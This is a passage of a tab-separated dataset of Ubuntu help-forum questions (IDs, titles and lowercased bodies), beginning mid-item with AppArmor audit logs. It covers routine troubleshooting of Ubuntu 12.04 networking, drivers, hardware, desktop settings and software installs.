apparmor_parser '' [ 4058.910390 ] audit_printk_skb : 18 callbacks suppressed [ 4058.910401 ] type=1400 audit ( 1344101946.497:130 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /sbin/dhclient '' pid=8264 comm= '' apparmor '' [ 4058.910757 ] type=1400 audit ( 1344101946.497:131 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=8264 comm= '' apparmor '' [ 4058.910969 ] type=1400 audit ( 1344101946.497:132 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=8264 comm= '' apparmor '' [ 4058.911185 ] type=1400 audit ( 1344101946.497:133 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/lib/libvirt/virt-aa-helper '' pid=8264 comm= '' apparmor '' [ 4058.911335 ] type=1400 audit ( 1344101946.497:134 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/sbin/libvirtd '' pid=8264 comm= '' apparmor '' [ 4058.911595 ] type=1400 audit ( 1344101946.497:135 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/sbin/mysqld '' pid=8264 comm= '' apparmor '' [ 4058.911856 ] type=1400 audit ( 1344101946.497:136 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/sbin/named '' pid=8264 comm= '' apparmor '' [ 4058.912001 ] type=1400 audit ( 1344101946.497:137 ) : apparmor= '' status '' operation= '' profile_remove '' name= '' /usr/sbin/tcpdump '' pid=8264 comm= '' apparmor '' [ 4060.266700 ] type=1400 audit ( 1344101947.853:138 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=8391 comm= '' apparmor_parser '' [ 4060.268356 ] type=1400 audit ( 1344101947.857:139 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=8391 comm= '' apparmor_parser '' [ 5909.432749 ] audit_printk_skb : 18 callbacks suppressed [ 5909.432759 ] type=1400 audit ( 1344103797.021:146 ) : apparmor= '' denied '' operation= '' open '' parent=8800 profile= '' /usr/sbin/named '' name= '' /var/log/query.log '' pid=8805 comm= '' named '' requested_mask= '' ac '' denied_mask= '' ac '' fsuid=107 ouid=0 root @ zotac : ~ # what can i do that it still works and i do n't have to disable apparmor ?
172033	connect to server from command line	in ubuntu 12.04 there is a connect to server in the global file menu . i use this to connect to my websites ftp server . is there a command to do this from the terminal ?
172036	ubuntu radial gradient desktop background	is it possible to add radial gradient to the list of possible background gradients in ubuntu 12.04 ?
172039	my matlab launcher does n't work	i 've installeb matlab r2011a on ubuntu 11.10 today following ubuntu 's guide . i 've also followed the steps to create the launcher . it appeared , but when i click on it nothing happens . does anyone knows what can i do to fix it ? please keep in mind that i 'm no expert in ubuntu , i 'm still getting used to it . additional info i can run it perfectly trough terminal . my only problem is getting the launcher to work . to create the launcher i used these instructions : get an icon : sudo wget http : //upload.wikimedia.org/wikipedia/commons/2/21/matlab_logo.png -o /usr/share/icons/matlab.png get the launcher file : sudo wget 'https : //help.ubuntu.com/community/matlab ? action=attachfile & do=get & target=matlab-r2011a.desktop ' -o /usr/share/applications/matlab.desktop
172041	window control buttons position return to right after every startup	i like window control buttons in the left , but whenever my laptop startup it 's return to right ... ! that 's forcing me to open ubuntu-tweak on every startup and change the settings . this is disturbing .
172042	orthomouse does n't work in ubuntu 12.04	i have a orthomouse for carpal tunnel and the mouse pointer does n't move at all . the buttons ( right , left , wheel ) work fine but i ca n't move the pointer . the mouse works fine in windows . i have a different microsoft optical mouse and that one works just fine in the same usb port . is there any way to fix this ? i really love my orhtomouse .
172048	smart status data interpretation - disk utility	last week my external harddisk ( seagate barracuda 1.5tb in a custom enclosure ) showed signs of failure ( disk utility smart pre-failure status - several bad sectors ) and i decided to change it . i bought a new hdd ( seagate barracuda 2tb ) and connected it to my ubuntu box with a sata to usb cable that could not report smart status . i copied all the contents of the old hdd to the new hdd ( one partition with rsync , the other with parted cp ) and then gently replaced the old hdd with the new one inside my aluminum enclosure . for obscure reasons after reconnecting the new hdd through the old enclosure , the linux box could not detect my partitions . i recovered the partitions with testdisk and restarted the computer . after the restart i checked the smart status of the new hdd an i get this : read error rate -- -- -- -- -- -- -- - normalized 108 worst 99 threshold 6 value 16737944 i got a high value on the seek error rate as well . wondering why this happens i copied 2 gb directory from one partition to the other and rechecked the smart status ( 5 minutes later ) . this time i got the following : read error rate -- -- -- -- -- -- -- - normalized 109 worst 99 threshold 6 value 24792504 as you see there has been an increase in the error rate . i am unable to interpret these numbers . is my new hard disk already dying ? what are the acceptable values in these fields for seagate hard disks ? then why the assessment is still good ? while i could get temperature and airflow temperature data from my old hdd , i can not fetch them for the new one . i noticed that my old hdd had got really hot sometimes . is it possible that the enclosure is killing the harddisks due to high temperature ? ... thanks
172050	unable to boot from live disk	i have an old dell d610 . i have upped the ram and hdd with the intent of installing ubuntu . however as ubuntu loads and gets to the first screen with the four small dots changing colour , it freezes and will go no further . i have tried a download from different sites with the same problem . i have also tried mint with the same problem . but when i run the old windows hdd and load any of those iso 's in virtualbox ( a virtual machine ) they work fine . even if i try to load any of the iso 's on the widows hdd installing these in the free space of this hdd , the same happen as with the new hdd , appears the same error . any ideas ?
172052	disabled lockscreen on ubuntu accidently , how to renable it ?	okay , so few months back i read a post somewhere , dont remember where but it was on how to disable the lock screen . now that i disable whenever the monitor switches off the system hangs . i remember editing using gedit to do that . how do i re enable lockscreen ? i 'm not talking about just removing it from the menu , im talking about disabling it completely . how do i re enable it ?
172053	stopping ubuntu locking the programme	how do i stop ubuntu from clearing the screen and asking for an unlock password every few minutes of inactivity ? i do n't want it to ever `` log me out '' or whatever it 's doing , however long a period of inactivity there might be . thanks .
172058	minecraft crashes after boot on ubuntu	i 've already tried to forceupdate it several times . after i log in , it goes dark , then i get the error message below . ideas ? -- -- minecraft crash report -- -- // do n't be sad . i 'll do better next time , i promise ! time : 8/4/12 2:18 pm description : failed to start game java.lang.illegalstateexception : only one lwjgl context may be instantiated at any one time . at org.lwjgl.opengl.display.create ( display.java:846 ) at org.lwjgl.opengl.display.create ( display.java:784 ) at org.lwjgl.opengl.display.create ( display.java:765 ) at net.minecraft.client.minecraft.a ( sourcefile:233 ) at net.minecraft.client.minecraft.run ( sourcefile:516 ) at java.lang.thread.run ( thread.java:679 ) relevant details : - minecraft version : 1.3.1 - operating system : linux ( i386 ) version 2.6.38-8-generic - java version : 1.6.0_24 , sun microsystems inc. - java vm version : openjdk client vm ( mixed mode , sharing ) , sun microsystems inc. - memory : 3767152 bytes ( 3 mb ) / 29392896 bytes ( 28 mb ) up to 1037959168 bytes ( 989 mb ) - jvm flags : 1 total ; -xmx1024m - lwjgl : 2.4.2 - opengl : ~error~ nullpointerexception : null - is modded : probably not - type : client - texture pack : ~error~ nullpointerexception : null - profiler position : n/a ( disabled )
172062	ssh'ing to my machine attaches an existing screen session and detaching it ends my ssh session	ssh'ing to my ubuntu machine automatically attaches an existing screen session and detaching ends my ssh session what i want is to be able to ssh to my ubuntu machine without automatically attaching to the screen session on that machine . or at least , i should be able to to detach from that screen session w/o ending my ssh session .. right ? does n't seem to work . this so that i can attempt to run firefox -- display < whichever one is being forwarded to my ssh session > , so that i can debug a website that the remote ubuntu machine is running ( via localhost ) . best case scenario is that i could just remote-desktop to my ubuntu machine . but it 's not set up to allow remote-desktop , and i see no way to set it up remotely via shell/ssh . also , it sounds like you need a static ip in order to remote desktop to an ubuntu machine ( so i keep reading ) .
172063	unable to use phpmyadmin , settings prompt gives an error while installing	i just finished installing phpmyadmin on my old mac book , everything seems to be working fine apart from phpmyadmin . i 've configured apache server with the required settings but still no luck . while installing phpmyadmin from software center something went wrong when , it prompted for some settings but it di n't go further and stopped with an error code ( started with 1000.. something ) , probably the issue lies in the settings config . should i reinstall and see if it goes through the settings prompt or do you recommend any other alternative tool ?
172065	is there anyway yet of disabling the gmail labels showing in the notification area ?	i know it 's pre-release , so it 's not finalised yet , however , i have quite the amount of labels i use for gmail ( over 20 ) and when i used the integration , in my notification centre i have to scroll down to use anything below the gmail labels which is quite annoying . is there anyone way to stop the display on labels and only show the inbox ? i ask this mainly because i do n't filter to labels , each e-mail i get i assign a new label or archive , so i never have the need to see how many unread emails are in each label . hope you 've understood what i 'm trying to say ! thank you .
172070	freeze frequently	i have buy lenovo ipad g580 and using ubuntu 12.04 but my laptop freeze frequently can not do anything . only one option turn off from button . can any one please help me.. configuration is as below intel core i5 third generation no nvidea card
172071	why can root still edit files with a permission of 0 ?	i just wanted to delete most files from an external hd except some certain ones . so i chmod these ones to 0 and did a sudo rm -r ./* . painfully , the result was that everything got deleted . why is that so ? root did n't have permission to touch these , but it did anyways . i am confused now .
172073	how do i get a ps3 sixasis controller working via usb ?	i am trying to get a ps3 sixaxis controller to work with ubuntu 12.04 . the ubuntu wiki page for sixaxis says to install qtsixa , which i did . the issue now is actually using the controller . i installed `` supertux 2 '' to test it out . normally , supertux says there is no joystick . when i plug in the ps3 controller , and press scan , it then displays all of the controls and their assigned buttons . i can then click on a action and it will prompt me to press the button i want to assign . the issue here that pressing buttons on the controller does n't do anything . i ca n't assign any of actions to a button on the controller . the same goes for pcsx . i can configure the controller , and select the sony playstation ( r ) 3 controller from the drop down , but when i try to assign a button , pressing buttons on the ps3 controller does n't do anything . on the web , i see tons of guides on how to connect with bluetooth , but my computer does n't have a bluetooth dongle , so i just want to connect via usb . in addition , qtsixa can see the controller too . i can `` configure default profile '' , which i have tried , but supertux 2 nor pcsx react any differently ... update : following the ubuntu community guide for sixaxis guide , i tried sudo apt-get install libusb-dev libusb-0.1-4 xserver-xorg-input-joystick , and then compiled sixpair . running sudo ./sixpair complains about enabling bluetooth , then supertux 2 ca n't find the controller anymore when i click scan . after reading this article , i found out i have to press the ps button to get it working ... well , that worked fine for using the controller as a pointer device . i can now make my mouse on screen dance using the analog sticks . i am still unsure of how to get it working with supertux 2 and pcsx though ... when i did n't have xserver-xorg-input-joystick installed , pressing the ps button caused it connect to the ps3 in the other room as controller 2 . i am very confused about what is going on right now ...
172075	why does n't `` su bind '' work ?	when you do apt-get install bind9 , there gets a user bind created . i 'm having some trouble with my bind installation . see how can i add file create read write and delete for a specific user ? how to allow bind in app armor ? for more information on that . i tried to debug by suing from root to user bind ( from root because i do n't know the password ) . usually this works for any user . but when i type su bind i get no error message , but the user on bash is still shown as root and whoami also tells me that i am still root . if i do the same for any other user , bash changes to that user and whoami also tells me that i am this user . so ... why ca n't i su to user bind ? this is what an excerpt from /etc/passwd : root @ zotac : /etc # cat passwd | grep `` bind '' bind : x:107:119 : :/var/cache/bind : /bin/false i tried replacing /bin/false with /bin/bash , but that does not make a difference . so what is the problem ?
172077	what security policies exist in place for packages and scripts ?	i did have used microsoft windows since windows 98 to windows 7 . i have found lots of security vulnerabilities by myself about how viruses , worms , spyware etc . compromises the system . microsoft windows vista & windows 7 uac ( user account control ) system and drives autorun prompts in windows vista and windows 7 can prevent some vulnerabilities . linux i am using ubuntu 11.10 now , and i realized that the most ( except one ) vulnerabilities does not exist in linux because of multi-user system . the problem people ( even i ) used to store *.exe , *.cmd , *.deb , *.sh and other executable and script files ( installers , portable browsers , scripts , etc . ) in pen drives ( flash memories ) and other removable media . when in windows 7 ( also in older versions ) if the target removable media connect to an infected system , then connect back to a fresh system , and run a *.exe , *.cmd or *.bat ( unsigned executable or script ) file that may prompt a uac dialog and user press yes this may execute malware code as administrator , injected to the unsigned executable or script file i do n't know about the signed executable files . never tested . i think , they can not not be infected or infected file can not be executed . what if , when in linux ? will the same may happen in *.deb , *.sh or any other executable or script files in linux ? i mean can the *.deb & other files be infected ? ( i think they can ) is there a mechanism in linux to verify the contents in *.deb files ? should i not keep the root access required executable and script files in removable media ? if i should not then what is the easiest way to manually verify if the file content was changed or not ? what about the repositories and packages from internet ? by using http , ftp ( not https ) the repositories and packages can be infected by an attacker while transporting or over proxies ( if used ) . also is there any thing similar to windows autorun in linux ? ( i think it is n't ) i just want the linux to be better secured in any condition ( even from small mistakes from users ) . i will ask about further possible security issues i found .
172079	first boot after installing with dvd - flashing white underscore	i just installed ubuntu from dvd , overwriting my previous win7/ubuntu dual boot . now , the first time booting ubuntu , it is just a flashing white underscore in the top left . i tried holding/pressing shift when booting to change to nomodeset but holding and tapping shift does nothing . i also attempted putting the dvd in , changing nomodeset and then `` boot to local hard disk '' , i got the same flashing white underscore again . any assistance would be greatly appreciated , thanks !
172081	setting up remote desktop via ssh ? not actually at the machine but can ssh	i 'm not going to be in front of my ubuntu machine for a while but i very much need to be able to remote desktop to it . in an ssh session , what 's the best route to take to set-up and allow certain users to remote desktop to my machine ?
172086	is it possible to install gnome-shell extended places extension in 12.04	just upgraded to 12.04 from 11.10 and am working through updating/replacing gnome-shell extensions . one particularly useful extension was : gnome-shell extended places , which included shortcuts to filezilla ftp sites , but also virtualbox machines . is it possible to install this in gnome-shell 3.4 ?
172089	black screen after logoff	every time i logoff from ubuntu 12.04 i get a black screen . if i logon again as if i could really see what i 'm doing , the screen returns to normal . this does n't happen with other two users on the same machine , with both of them i can logoff withouth problems . any clues ?
172091	how to tunnel traffic to certain destinations over ssh ?	i 'd like to send traffic destined to certain ip/subnet through one ssh socks5 , while routing other traffic through another socks5 tunnel . i 'd tried tsocks with following configuration : path { server = 127.0.0.1 server_port = 3001 server_type = 5 reaches = 1.2.3.4/32 } but then i try `` tsocks wget 1.2.3.4 '' it does n't go through that proxy giving an error ip ( 0.0.0.0 ) & 18:32:14 libtsocks ( 16065 ) : subnet ( 0.0.0.0 ) ! = ip on line 33 in configuration file , ignored i do n't understand the error . i 'm also thinking if i can do this using iptables . any recommendations on how this can be done ?
172092	dual-boot with vista ?	i want to know how to dual boot my computer with ubuntu 12.04 and windows vista ( step by step would be best ) and also wanted to know if it would slow down my pc even more than it already is ?
172094	pygobject : gio.file.copy_async ( ) does n't exist in ubuntu 12.04	according to gio reference manual gio.file has a methode copy_async . in ubuntu 12.04 i 'm getting an attributeerror when i try to call this method . what should i use instead to for asynchronous copying ? i could use gio.outputstream.splice_async ( ) but that does n't give me a progress callback
172096	could a kde plasma widget be converted into its own app ( easily ) ?	i 've recently made the switch from kde to unity and i 'm really missing one feature : the folderview plasma widget ( plasmoid ? ) i know there 's a screenlet called folderview which can be used under unity , but it 's so buggy it 's virtually usless ( and even it if were n't it does n't even come close to mimic all the features of kde 's folderview ) so the question is : is there any way to easily convert/translate a plasmoid into a stand alone app to be used in unity ? or are plasmoids so dependent on the plasma desktop it would be like writing a new app from scratch ? edit : i 've been using the folderview screenlet and so far it 's not that buggy , only a couple of crashes which have no actual effect on the system 's behavior . perhaps it 'll do .
172106	ubuntu server 12.04 + wine + filezilla ftp server help	i am not very experienced with non-windows operating systems , so please if you can answer , consider me to be a complete newbie with this . i have a ubuntu server 12.04 , i installed wine on it so i could install some familiar programs with gui on my ubuntu . i installed filezilla server using wine , that went fine , the server is running , but i can not find the gui anywhere . i know it is running because in the winefile , if i execute the filezille server.exe , it says it is already running . however i have not been able to configure anything on the filezilla server because i ca n't see it anywhere . what am i missing ?
172114	where is the man page for the `` rename.ul '' command ?	the man page for the command `` rename.ul '' has disappeared and i would like to install it , read it on-line or whatever , but it would be better to have it installed as it was before , in the good times . it is a useful command and it is not a good idea to have its man page redirected to `` rename '' 's man page because it is a different command .
172119	dvd drive unable to eject/load and wo n't recognize/play anything	i am running 12.04 , and my drive is a plextor px 880sa . my dvd player does not work . today was my first attempt at trying to use it in months , or maybe even longer , so i 'm not sure how long it has been inoperative . i ca n't even open the drive . i 've tried a number of terminal commands , including : eject sudo eject sudo eject /dev/sr0 file /dev/sr0 sudo eject -i off the error message i keep receiving is : eject : unable to eject , last error : inappropriate ioctl for device the light on the drive will light up , but it still wo n't eject/open . i was able to manually open it by sticking a pin in the hole of the drive , but it is still a `` dead '' drive . it wo n't automatically close with a light push , and wo n't recognize the loaded dvd .
172120	is there a way to cycle through workspaces ?	i might be missing it , but i only saw a way to move one workspace to the left , right , up and down . is there a keybind to cycle through them all continuously ?
172121	installing wine without an internet connection on 12.04	i have an old desktop - 7 years old - without a wifi card and without access to a physical internet connection . instead of upgrading from 11.04 to 12.04 , i had to do a fresh install of 12.04 due to some broken packages that i was n't able to find . i have a wifi dongle , but it 's for a windows os . i have a netbook with a wifi card , so i 've been able to download the deb packages and transfer them to the desktop . i 've been installing the deb packages and supporting libraries for wine one-by-one in the terminal so that i can download the wifi driver and have internet on this desktop . except that i 'm unable to install the kmod deb . i get the message that doing so will break the module-init-tools , and that auto-deconfigure might help . but i ca n't find anywhere how to uninstall module-init-tools , or overwrite them with kmod , or just break the packages , or how to use auto-deconfigure . not in any fashion that i understand , anyway . i 'm newbie to intermediate . thank you for any help you can provide .
172125	i am not able to install this software 'zekr ' from .tar.gz file	i am using 12.04 . i was trying to install 'zekr ' from 'zekr-1.1.0-linux_64.tar.gz ' file i downloaded from http : //zekr.org . from what i could understand , it is a java program . i extracted the file and there was no installation instructions in it . i tried using ./configure after changing directory to extracted folder ( i got this from some forum ) , but it says bash : ./configure : no such file or directory . and there was no file called configure in the extracted folder . so please help me installing this software from this file . this file is not yet available in repository ( though its previous version 1.0 does ) . edit : this is the output of ls al in he extracted folder . sorry for late reply . total 32 -rwxrwxrwx 1 faheem faheem 5628 jul 5 21:27 build.xml drwxrwxrwx 2 faheem faheem 4096 jul 19 18:04 dist drwxrwxrwx 3 faheem faheem 4096 jul 19 18:04 doc drwxrwxrwx 2 faheem faheem 4096 jul 19 18:04 lib -rwxrwxrwx 1 faheem faheem 4027 jul 5 18:03 readme.txt drwxrwxrwx 9 faheem faheem 4096 jul 19 18:04 res -rwxrwxrwx 1 faheem faheem 1166 jul 19 17:59 zekr.sh edit : thanks everyone for helping . anyway , i got from zekr official forum ( google group ) that what i had to do was run a file called zekr.sh in the extracted folder and it worked . not exactly the way i wanted because i wanted to replace the current version permanently and to see it in application search . but it runs just fine for now . i created a shortcut of the file and put it in desktop for convenience .
172126	how to install okular 0.15 on 12.04 lts ?	see here for reference : http : //okular.kde.org/news.php the new version includes an option to save annotations to the pdf file itself . that 's why i am very eager to try out . is there any ppa from which i could install this new version ? edit : following 808sound 's advice i managed to install okular 0.15 on precise . the dependencies installed with the upgrade caused several issues with other programs . fixing these issues required uninstalling okular and downgrading packages that were upgraded with it . you might want to install okular from the kubuntu backports ppa instead , although in this case you wo n't be able to export annotations to pdf . see below for more information . please keep this in mind before choosing the source you want to install the latest okular from . small remark : blaxpirit 's answer will provide you with the latest okular minus the annotation feature . for this specific functionality to work you will have to follow 808sound 's answer .
172127	gimp fails to load	when i try to load gimp , the splash screen flickers on , but disappears as soon as it shows . when opening through terminal , the following error is displayed : gegl-geglmodule.c-message : module '/usr/lib/x86_64-linux-gnu/gegl-0.2/remap.so ' load error : /usr/lib/x86_64-linux-gnu/gegl-0.2/remap.so : undefined symbol : gegl_operation_point_composer3_get_type segmentation fault ( core dumped ) all help is appreciated as using it soon is required . > . < ubuntu 12.04 64-bit gimp version is 2.8 the following is an error i get when trying to 'sudo apt-get upgrade ' . this probably is related . the following packages have unmet dependencies . libopenal1 : breaks : libopenal1 : i386 ( ! = 1:1.14-4ubuntu1 ) but 1:1.13-4ubuntu3 is > installed libopenal1 : i386 : depends : libopenal-data : i386 ( = 1:1.13-4ubuntu3 ) breaks : libopenal1 ( ! = 1:1.13-4ubuntu3 ) but 1:1.14-4ubuntu1 is > installed
172129	are changes in a point release applied progressively to a released version before it comes out	( note that i think the title can receive a change to better explain what i am asking here ) i have installed a fresh copy of ubuntu 12.04 . i noticed that the 12.04.1 will come soon and was wondering if the updates that 12.04.1 will bring are applied to 12.04 progressively until 12.04.1 comes out or are they applied all at the same time when 12.04.1 comes out .
172131	error while setting up openvpn	i followed the instructions to set up openvpn , from here , now i am getting this error $ sudo /etc/init.d/openvpn restart stopping virtual private network daemon ( s ) ... no vpn is running . * starting virtual private network daemon ( s ) ... autostarting vpn 'server' /etc/openvpn/up.sh : 7 : /sbin/brctl : not found
172135	why is n't ethernet bridging working with openstack ?	i 'm trying to setup openstack with the nova.network.manager.flatmanager network manager which attaches ( in my setting ) every virtual machine to the br100 network bridge . on my host , i 'm using the following network setting : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.0.50 netmask 255.255.255.0 broadcast 192.168.0.255 gateway 192.168.0.1 auto eth0:0 iface eth0:0 inet static address 192.168.100.1 netmask 255.255.255.0 broadcast 192.168.100.255 which results in the following interface configuration : eth0 link encap : ethernet hwaddr 00:1a:92:08:15:43 inet addr:192.168.0.50 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :21a:92ff : fe08:1543/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:5365 errors:0 dropped:0 overruns:0 frame:0 tx packets:5177 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:572855 ( 572.8 kb ) tx bytes:1812681 ( 1.8 mb ) interrupt:43 base address:0x6000 eth0:0 link encap : ethernet hwaddr 00:1a:92:08:15:43 inet addr:192.168.100.1 bcast:192.168.100.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 interrupt:43 base address:0x6000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:49079 errors:0 dropped:0 overruns:0 frame:0 tx packets:49079 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:25157104 ( 25.1 mb ) tx bytes:25157104 ( 25.1 mb ) virbr0 link encap : ethernet hwaddr c6 : b2:4f : da : cd : ff inet addr:192.168.122.1 bcast:192.168.122.255 mask:255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) vnet1 link encap : ethernet hwaddr fe:16:3e:3a:77 : dc inet6 addr : fe80 : :fc16:3eff : fe3a:77dc/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:153 errors:0 dropped:0 overruns:0 frame:0 tx packets:6 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:500 rx bytes:6642 ( 6.6 kb ) tx bytes:468 ( 468.0 b ) the bridge configuration ( brctl show ) looks like this : bridge name bridge id stp enabled interfaces br100 8000.fe163e3a77dc no vnet1 virbr0 8000.000000000000 yes i 've created a virtual machine ( using vnet1 ) that has been assigned the ip address 192.168.100.2 . for me , everything seem fines , except that eth0:0 is not attached to the bridge . when i try to change that by running brctl addif br100 eth0:0 , networking breaks completely ( i can not ping other hosts on the 192.168.0.x subnet anymore ) , but still , i can not ping the virtual machine attached to the bridge ( using the vnet1 interface ) . how can i attach eth0:0 to the bridge without breaking my eth0 lan connection ? or is there a superior way for networking in an openstack test environment on a host with only one physical network adapter ?
172137	not able to set nautilus as my default file manager	i wanted to try out xfce and installed it . when i launched the file manager in xfce , it prompted me to choose between thunar and nautilus and i chose thunar just to try it out . but now , i moved back to gnome 3 and thunar is still my default file manager . i want to get back to nautilus as my default file manager and i am not able to do it . i tried the steps provided in https : //help.ubuntu.com/community/defaultfilemanager . but thats not working too .
172139	problem installing nvidia-linux-x86-302.07.run in 12.04	i have a catch 22 problem in trying to install this driver ( nvidia-linux-x86-302.07.run ) to set my screen to its native resolution of 1280x1024 ( hpl1906 ) . problem is that in order to install this driver , i need to stop the xserver but when i do this ( sudo service lightdm stop ) , my screen goes blank and displays the message - out of range 1280x1024 need to reset ( or something similar ) - and i can go no further . so , i can not install nvidia-linux-x86-302.07.run without stopping lightdm but when i do so , i can no longer see anything on the screen or go further to install the driver that would let me adjust the resolution . any advice on getting out of this loop would be greatly appreciated .
172142	ubuntu preloaded laptops help	i have been wanting a new laptop because of my slow vista desktop and i want a preloaded ubuntu laptop . i need help on what to buy because i am limited to about $ 1200 and i will be using this laptop for gaming with steam .
172143	chrome browser is causing ubuntu 12.04 to crash	why does chrome browser cause ubuntu 12.04 to crash . the keyboard & mouse cease to function and the screen displays lots of text which includes the word 'panic ' . this has never happened when firefox was used ( 100 's ) but it 's inevitable after an hour or so on chrome .
172147	how to make disk partition in ubuntu after installing ubuntu ?	i installed ubuntu in my pc.now my pc have only one partition.i like to know how to make disk partition in ubuntu after installing ubuntu ?
172148	remap function keys to commands ?	i 'm running ubuntu 12.04 on a samsung series 9 ( 900x3a-a03 ) , and changing the brightness through the function keys or the brightness control ui causes flickering and general instability , so i have a script that changes brightness through acpi and works perfectly . what would be the simplest way to remap my brightness keys ( fn+f2 , fn+f3 ) to the new command ? i 've tried using the keyboard > shortcuts > custom shortcuts interface in the system settings , but the current xf86monbrightnessup function still seems to take precedence . edit : ended up solving this one by updating to the quetzal 3.5 kernel and the latest x from ubuntu-x-swat .
172159	how to fix `` /etc/apt/sources.list '' could not be read error ?	i tried to reinstall sopcast with the following command : sudo tee -a /etc/apt/sources.list but nothing happened , then i try the next command : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys cd30ee56 and i get the following error : e : type 'sudo ' is not known on line 60 in source list /etc/apt/sources.list e : the list of sources could not be read . could anyone please help me ?
172160	how can i 'span ' images in wallpapers.xml	i 'm trying to set up some backgrounds and wrote a custom xml for that ( later on i want to make a custom slideshow of these ) . the images should span over my dual monitor . $ cat /home/user/.local/share/gnome-background-properties/wallpapers.xml < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < ! doctype wallpapers system `` gnome-wp-list.dtd '' > < wallpapers > < wallpaper > < name > test1 < /name > < filename > /home/user/bilder/test1.jpg < /filename > < options > span < /options > < pcolor > # 000000 < /pcolor > < scolor > # 000000 < /scolor > < shade_type > solid < /shade_type > < /wallpaper > < /wallpapers > with options set to 'span ' control-center does only show a black thumbnail . starting control-center from terminal brings up an error : $ gnome-control-center background ( gnome-control-center:7019 ) : background-cc-panel-warning ** : unhandled value 'span ' for enum 'gdesktopbackgroundstyle' if i set options to 'zoom ' everything works fine .
172169	laptop as wireless access point	i have a vaio laptop running ubuntu 12.04 ( 64 bit ) . i use a wired internet connection . i want to share this connection using my laptop 's wifi as access point . how can i do this ?
172170	webcam stopped working but appears in lsusb , works fine in windows	this has been bugging me for some time now ... laptop : thinkpad t420 ubuntu 12.04 precise when i installed precise , i could use my webcam without any issue ( cheese , skype ... ) however , all of a sudden ( i suppose after an update ) it stopped working , cheese showing me `` no device found '' , but stll shows up in lsusb lsusb bus 001 device 004 : id 04f2 : b221 chicony electronics co. , ltd integrated camera however /dev/video0 does not exist ... i do n't see how to debug this , i assume it must be easy since it used to work perfectly on this same machine and installation . it is worth mentioning that the webcam is not damaged or disconnected as it is working flawlessly in my dual-boot windows partition . the only reason i boot on windows now is to use skype , since ubuntu doesnât allow me thus luxury ... any help would be greatly appreciated . please let me know if you need more details . thank you !
172173	ivy bridge graphics not working ( core i5 hd 2500 )	i 've done a fresh install of ubuntu 12.04 64bit and i 'm having major problems getting the display working . specs : asus p8z77-i deluxe ( latest bios , uses z77 chipset ) intel core i5-3470 ( onboard hd 2500 graphics ) 16gb ram booting from an ssd . a 1080p tv is hooked up to the onboard hdmi port . the installer loaded but there were heavy graphic glitches inside any window so i could n't read the install text . i managed to install by setting nomodeset . then on first boot i got a blank screen , only the cursor was visible and then the computer froze . i then upgraded to the latest kernel ( 3.6-rc1 ) , added the xorg-edgers repo and did a full dist-upgrade . so i should be fully up to date with the latest intel drivers . however this did n't make any difference . if i set nomodeset then it boots to x and everything is recognised correctly in system info , but my monitor is listed as 'laptop ' and i 'm limited to 800x600 and system info says 'vesa ' . i 'm guessing any hardware acceleration is disabled in this mode so that 's no good . if i do n't set nomodeset then i either get a blank screen or a complete crash with a hung gpu . james @ goon : ~ $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) trying to run xorg -configure : http : //paste.ubuntu.com/1130122/ number of created screens does not match number of detected devices . some output from kern.log : http : //paste.ubuntu.com/1130124/ i can post any other logs required ! there is also a similar question here : graphics not working with intel i5-3470 i also found a bug report : http : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-intel/+bug/1031784 it claims to be fixed and i tried the ppa linked in comment # 12 , did the upgrades and rebooted.. and it still crashes .
172174	hp 430 and 630 graphics drivers	my hp 630 laptop is rrunning in low graphics mode . what can i do ?
172177	can the ubuntu certification help professionally ?	if i do ubuntu certification , how much can it help me professionally , especially when it comes to applying for jobs ?
172179	sound suddenly broken on ubuntu 12.04	i know there are lots of posts on this , but they do n't seem to deal with my problem , so i 'm going to start a new thread anyway . i installed ubuntu 12.04 through wubi a few days ago , and everything was going perfectly fine until this morning when my sound suddenly stopped working without any warning . i have since found that changing between ac and battery power briefly restores sound for a few seconds . i 've tried everything conventional from rebooting to checking sound settings ( all fine ) , switching between digital output and speakers , but nothing seems to work .
172187	what happens with an interrupted upload to ubuntuone ?	i have uploaded 465m of a 677m folder to ubuntu one . but it stopped for some reason . how do i continue the upload to complete the file please . bandwidth very limited .
